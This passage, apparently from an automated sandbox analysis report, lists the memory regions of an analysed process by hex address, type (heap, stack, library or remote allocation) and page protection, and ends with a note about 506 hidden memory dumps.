|
heap
|
page read and write
|
||
|
78D000
|
heap
|
page read and write
|
||
|
C5E000
|
stack
|
page read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
DEF000
|
stack
|
page read and write
|
||
|
4DCF000
|
stack
|
page read and write
|
||
|
3492000
|
trusted library allocation
|
page read and write
|
||
|
25AA000
|
trusted library allocation
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
16D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
1DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FC000
|
heap
|
page read and write
|
||
|
25A2000
|
trusted library allocation
|
page read and write
|
||
|
8B3D000
|
stack
|
page read and write
|
||
|
5DCE000
|
stack
|
page read and write
|
||
|
5460000
|
heap
|
page read and write
|
||
|
24DE000
|
stack
|
page read and write
|
||
|
25AD000
|
trusted library allocation
|
page read and write
|
||
|
56D000
|
stack
|
page read and write
|
||
|
432000
|
heap
|
page read and write
|
||
|
651000
|
heap
|
page read and write
|
||
|
1E20000
|
heap
|
page read and write
|
||
|
1EDE000
|
stack
|
page read and write
|
||
|
26A000
|
stack
|
page read and write
|
||
|
21E0000
|
trusted library allocation
|
page read and write
|
||
|
7AF000
|
heap
|
page read and write
|
||
|
744000
|
heap
|
page read and write
|
||
|
756000
|
heap
|
page read and write
|
||
|
4FA0000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
28AF000
|
stack
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
625E000
|
stack
|
page read and write
|
||
|
680000
|
heap
|
page execute and read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
B0000
|
trusted library allocation
|
page read and write
|
||
|
319000
|
trusted library allocation
|
page read and write
|
||
|
458000
|
trusted library allocation
|
page read and write
|
||
|
55CE000
|
stack
|
page read and write
|
||
|
78D000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
526D000
|
stack
|
page read and write
|
||
|
A28000
|
trusted library allocation
|
page read and write
|
||
|
35C000
|
stack
|
page read and write
|
||
|
164000
|
trusted library allocation
|
page read and write
|
||
|
1E24000
|
heap
|
page read and write
|
||
|
25AA000
|
trusted library allocation
|
page read and write
|
||
|
3864000
|
trusted library allocation
|
page read and write
|
||
|
388000
|
stack
|
page read and write
|
||
|
1CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CAF000
|
stack
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
22D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DE000
|
heap
|
page read and write
|
||
|
5C0000
|
trusted library allocation
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
B17000
|
heap
|
page read and write
|
||
|
4350000
|
trusted library allocation
|
page read and write
|
||
|
5E5D000
|
stack
|
page read and write
|
||
|
7E7000
|
heap
|
page read and write
|
||
|
857C000
|
stack
|
page read and write
|
||
|
246A000
|
trusted library allocation
|
page read and write
|
||
|
6291000
|
heap
|
page read and write
|
||
|
5760000
|
heap
|
page read and write
|
||
|
3C2000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page execute and read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
3331000
|
trusted library allocation
|
page read and write
|
||
|
8E2000
|
heap
|
page read and write
|
||
|
7D4000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
F9E000
|
stack
|
page read and write
|
||
|
5740000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
79D000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
216E000
|
stack
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
282000
|
trusted library allocation
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
3CE000
|
stack
|
page read and write
|
||
|
7AF000
|
heap
|
page read and write
|
||
|
8604000
|
heap
|
page read and write
|
||
|
5E0000
|
trusted library allocation
|
page read and write
|
||
|
5320000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
228E000
|
stack
|
page read and write
|
||
|
459F000
|
stack
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A9D000
|
stack
|
page read and write
|
||
|
1A4000
|
trusted library allocation
|
page read and write
|
||
|
5B50000
|
heap
|
page read and write
|
||
|
85FF000
|
heap
|
page read and write
|
||
|
1D20000
|
trusted library allocation
|
page read and write
|
||
|
7DE000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
25D8000
|
trusted library allocation
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
1A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E2000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
5F5000
|
heap
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
30D000
|
stack
|
page read and write
|
||
|
5B61000
|
heap
|
page read and write
|
||
|
BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
25B5000
|
trusted library allocation
|
page read and write
|
||
|
3A4000
|
heap
|
page read and write
|
||
|
5FAE000
|
stack
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
5890000
|
heap
|
page read and write
|
||
|
317000
|
trusted library allocation
|
page read and write
|
||
|
4940000
|
heap
|
page execute and read and write
|
||
|
7E7000
|
heap
|
page read and write
|
||
|
308F000
|
stack
|
page read and write
|
||
|
2190000
|
heap
|
page read and write
|
||
|
5E0E000
|
stack
|
page read and write
|
||
|
334000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
1AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
85DD000
|
heap
|
page read and write
|
||
|
57FF000
|
stack
|
page read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
450D000
|
stack
|
page read and write
|
||
|
441B000
|
stack
|
page read and write
|
||
|
27D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
251B000
|
trusted library allocation
|
page read and write
|
||
|
5D7E000
|
stack
|
page read and write
|
||
|
4880000
|
heap
|
page read and write
|
||
|
7DC000
|
heap
|
page read and write
|
||
|
25EB000
|
trusted library allocation
|
page read and write
|
||
|
4F7C000
|
heap
|
page read and write
|
||
|
12B000
|
stack
|
page read and write
|
||
|
297000
|
trusted library allocation
|
page execute and read and write
|
||
|
727000
|
heap
|
page read and write
|
||
|
1CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
8780000
|
heap
|
page read and write
|
||
|
586000
|
heap
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
remote allocation
|
page read and write
|
||
|
A0000
|
trusted library allocation
|
page read and write
|
||
|
53A0000
|
heap
|
page read and write
|
||
|
3620000
|
trusted library allocation
|
page read and write
|
||
|
2296000
|
heap
|
page execute and read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
25C2000
|
trusted library allocation
|
page read and write
|
||
|
25AE000
|
trusted library allocation
|
page read and write
|
||
|
278000
|
trusted library allocation
|
page read and write
|
||
|
3359000
|
trusted library allocation
|
page read and write
|
||
|
4B04000
|
heap
|
page read and write
|
||
|
86FE000
|
stack
|
page read and write
|
||
|
2545000
|
trusted library allocation
|
page read and write
|
||
|
2C7000
|
heap
|
page read and write
|
||
|
F90000
|
heap
|
page read and write
|
||
|
893000
|
heap
|
page read and write
|
||
|
48FD000
|
stack
|
page read and write
|
||
|
3511000
|
trusted library allocation
|
page read and write
|
||
|
3480000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
7D7000
|
heap
|
page read and write
|
||
|
290000
|
trusted library allocation
|
page execute and read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
4DCE000
|
stack
|
page read and write | page guard
|
||
|
3273000
|
heap
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
77E000
|
heap
|
page read and write
|
||
|
7A5000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
1C2000
|
trusted library allocation
|
page read and write
|
||
|
292000
|
trusted library allocation
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
603F000
|
stack
|
page read and write
|
||
|
351F000
|
stack
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
2180000
|
trusted library allocation
|
page execute and read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
34E000
|
stack
|
page read and write
|
||
|
914000
|
heap
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
602E000
|
stack
|
page read and write
|
||
|
1BA000
|
trusted library allocation
|
page read and write
|
||
|
85EF000
|
heap
|
page read and write
|
||
|
28A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BF000
|
stack
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
22E0000
|
trusted library allocation
|
page read and write
|
||
|
4ACF000
|
stack
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
4FFB000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page execute and read and write
|
||
|
792000
|
heap
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
1F3E000
|
stack
|
page read and write
|
||
|
85C0000
|
heap
|
page read and write
|
||
|
3620000
|
trusted library allocation
|
page read and write
|
||
|
5BF1000
|
heap
|
page read and write
|
||
|
352A000
|
heap
|
page read and write
|
||
|
89BF000
|
stack
|
page read and write
|
||
|
4F90000
|
heap
|
page read and write
|
||
|
3A64000
|
trusted library allocation
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
687000
|
heap
|
page read and write
|
||
|
2170000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
757000
|
heap
|
page read and write
|
||
|
843E000
|
stack
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
There are 506 hidden memdumps, click here to show them.